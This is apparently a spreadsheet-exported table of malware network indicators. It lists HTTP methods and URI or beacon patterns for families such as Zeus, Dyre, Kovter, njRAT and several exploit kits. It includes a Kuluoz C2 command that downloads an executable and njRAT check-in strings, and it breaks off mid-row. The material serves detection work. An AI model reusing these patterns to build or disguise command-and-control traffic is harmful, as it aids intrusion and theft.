<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Gypothy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gypothy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/bigbight/kinkong.txt"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/bigbight/kinkong.txt</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"H-W0rm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">H-W0rm</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/SpCoderHere"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/SpCoderHere</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"KaiXin EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">KaiXin EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/indexindex/\n/indexindex/gg.jpg\n/indexindex/jquery-1.4.2.min.js\n/indexindex/swfobject.js\n/indexindex/main.html\n/xzz1.exe\n/indexindex/NlNwQh.jar\n/indexindex/com.class\n/indexindex/edu.class\n/indexindex/net.class\n/indexindex/org.class"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/indexindex/<br />/indexindex/gg.jpg<br />/indexindex/jquery-1.4.2.min.js<br />/indexindex/swfobject.js<br />/indexindex/main.html<br />/xzz1.exe<br />/indexindex/NlNwQh.jar<br />/indexindex/com.class<br />/indexindex/edu.class<br />/indexindex/net.class<br />/indexindex/org.class</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Kovter"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Kovter</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/9/form.php \n/11/form.php\n/w1/form.php\n/1/feed.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/9/form.php <br />/11/form.php<br />/w1/form.php<br />/1/feed.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nuclear EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nuclear EK</span></td><td data-sheets-value="[null,2,"GET / POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET / POST</span></td><td data-sheets-value="[null,2,"/XhBWV0gBT08OVFVW.html\n/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA\n/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/XhBWV0gBT08OVFVW.html<br />/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA<br />/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Poweliks"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Poweliks</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2\n/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2\n/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2\n/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2<br />/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2<br />/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2<br />/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Redirect to Fiesta EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Redirect to Fiesta EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO &\nm_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO &<br />m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sweet Orange EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sweet Orange EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/admin4_account/mobile/movies.php?timeline=18\n/bad/generic/help.php?state=39\n/cnet/tmp/Indy_admin/investor.php?setup=20\n/dbadmin/wp-admin/hex/help.php?state=33\n/forums/example/screens/investor.php?setup=20\n/gcc/tmp/bad/help.php?state=25\n/ip/ch/investor.php?setup=20\n/profiles/stat/movies.php?timeline=21"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/admin4_account/mobile/movies.php?timeline=18<br />/bad/generic/help.php?state=39<br />/cnet/tmp/Indy_admin/investor.php?setup=20<br />/dbadmin/wp-admin/hex/help.php?state=33<br />/forums/example/screens/investor.php?setup=20<br />/gcc/tmp/bad/help.php?state=25<br />/ip/ch/investor.php?setup=20<br />/profiles/stat/movies.php?timeline=21</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sweet Orange EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sweet Orange EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064\n/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair\n/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix\n/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249\n/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535\n/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil\n/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954\n/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064<br />/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair<br />/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix<br />/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249<br />/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535<br />/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil<br />/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954<br 
/>/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"TBD"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">TBD</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/store/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/store/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"TBD Post Flashpack"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">TBD Post Flashpack</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ\n/search?q=wrestling&subid=4699\n/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ<br />/search?q=wrestling&subid=4699<br />/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"TBD Proxy (Htbot?)"]" style="padding: 2px 3px; vertical-align: bottom;"><span style="font-size: x-small;">TBD Proxy (Htbot?)</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ocfg.php?command=getip\n/ocfg.php?command=getid\n/ocfg.php?command=ghl&id=1493496\n/ocfg.php?command=dl&id=1493496\n/ocfg.php?command=version&id=1493496\n/ocfg.php?command=getbackconnect\n/pointer.php?proxy=<IP>%3A24635&secret=BER5w4evtjszw4MBRW"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ocfg.php?command=getip<br />/ocfg.php?command=getid<br />/ocfg.php?command=ghl&id=1493496<br />/ocfg.php?command=dl&id=1493496<br />/ocfg.php?command=version&id=1493496<br />/ocfg.php?command=getbackconnect<br />/pointer.php?proxy=<ip>%3A24635&secret=BER5w4evtjszw4MBRW</ip></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Upatre"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Upatre</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1501us22/<PC--NAME>/0/51-SP3/0/\n/1501us22/<PC--NAME>/1/0/0/\n/2807cw/<PC-Name>/1/0/0/\n/2807cw/<PC-Name>/41/5/4/\n/2807cw/<PC-Name>/0/51-SP2/0/\n/1201uk1/<PC-Nam/0/61/0/ \n/1201uk1/<PC-Name>/0/51-SP3/0/ \n/1201uk1/<PC-Name>/1/0/0/ \n/1201uk1/<PC-Name>/41/7/4/ \"\n/2307stat/<PC-Name>/0/51Service%20Pack%202/0/\n/2307stat/<PC-Name>/1/0/0/\n/2307stat/<PC-Name>/41/5/4/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1501us22/<pc--name>/0/51-SP3/0/<br />/1501us22/<pc--name>/1/0/0/<br />/2807cw/<pc-name>/1/0/0/<br />/2807cw/<pc-name>/41/5/4/<br />/2807cw/<pc-name>/0/51-SP2/0/<br />/1201uk1/<pc-nam br="">/1201uk1/<pc-name>/0/51-SP3/0/ <br />/1201uk1/<pc-name>/1/0/0/ <br />/1201uk1/<pc-name>/41/7/4/ "<br />/2307stat/<pc-name>/0/51Service%20Pack%202/0/<br />/2307stat/<pc-name>/1/0/0/<br />/2307stat/<pc-name>/41/5/4/</pc-name></pc-name></pc-name></pc-name></pc-name></pc-name></pc-nam></pc-name></pc-name></pc-name></pc--name></pc--name></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Vavtrak / Neverquest"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Vavtrak / Neverquest</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/collection/0000004E/00/9EBD6132"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/collection/0000004E/00/9EBD6132</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zeus"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zeus</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/backup/config.bin\n/en/images/config.bin\n/guardnow/config.bin\n/guardnow/config.bin"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/backup/config.bin<br />/en/images/config.bin<br />/guardnow/config.bin<br />/guardnow/config.bin</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zeus"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zeus</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/choosen/helps/file.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/choosen/helps/file.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"AdWare Kraddare.IL"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">AdWare Kraddare.IL</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... <very long string> ..@RwNPRwNN::"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... <very long="" string=""> ..@RwNPRwNN::</very></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"AdWare Kraddare.IL"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">AdWare Kraddare.IL</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/bv/config.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/bv/config.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dyre"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dyre</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/2001uk11/HOME/1/0/0/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/2001uk11/HOME/1/0/0/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dyre"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dyre</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/mandoc/eula012.pdf"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/mandoc/eula012.pdf</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dyre"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dyre</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/mandoc/ml1from1.tar"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/mandoc/ml1from1.tar</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dyre plugin dl"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dyre plugin dl</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ineede900.rar"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ineede900.rar</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Kazy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Kazy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Mudrop"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Mudrop</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c=</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"ChePro (Brazil.banker)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">ChePro (Brazil.banker)</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ini/xvwmmwb.mod"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ini/xvwmmwb.mod</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cryptolocker"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cryptolocker</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/home/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/home/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Reedum"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Reedum</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Vidgrab"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Vidgrab</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"(172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|."]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">(172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|.</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Page / stscout / Elise / lStudio / Wumins"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Page / stscout / Elise / lStudio / Wumins</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/29af9cdc/page_12082223.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/29af9cdc/page_12082223.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Tijcont"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Tijcont</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/s/blog_b2afd7fe01019tkf.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/s/blog_b2afd7fe01019tkf.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Darkcomet"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Darkcomet</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/a.php?id=c2ViYWxpQGxpYmVyby5pdA=="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/a.php?id=c2ViYWxpQGxpYmVyby5pdA==</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Kelihos"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Kelihos</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Kuluoz Run command from C2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Kuluoz Run command from C2</span></td><td data-sheets-value="[null,2,"n"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">n</span></td><td data-sheets-value="[null,2,"c=run&u=/get/7d2c37d2070e1b386070db8c851dae08.exe&crc=9e2b9c4f465b765fc971423935c4b68e"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">c=run&u=/get/7d2c37d2070e1b386070db8c851dae08.exe&crc=9e2b9c4f465b765fc971423935c4b68e</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"njRAT / Backdoor.LV"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">njRAT / Backdoor.LV</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'|Examiner|'|'|2013-06-21|'|'|USA|'|'|Win XP ProfessionalSP2 ...\n\n171.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJDMzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'||'|'|b88ece4c04f706c9717bbe6fbda49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uLi4uLi4uDQpyZWVlZWVkLmR5bmRucy5iaXo6MjUyNTQNCkFwcERhdGENCldpbnJhci5leGUNClRydWUNCkZhbHNlDQpUcnVlDQpGYWxzZQ==0.\n\n251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJDMzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 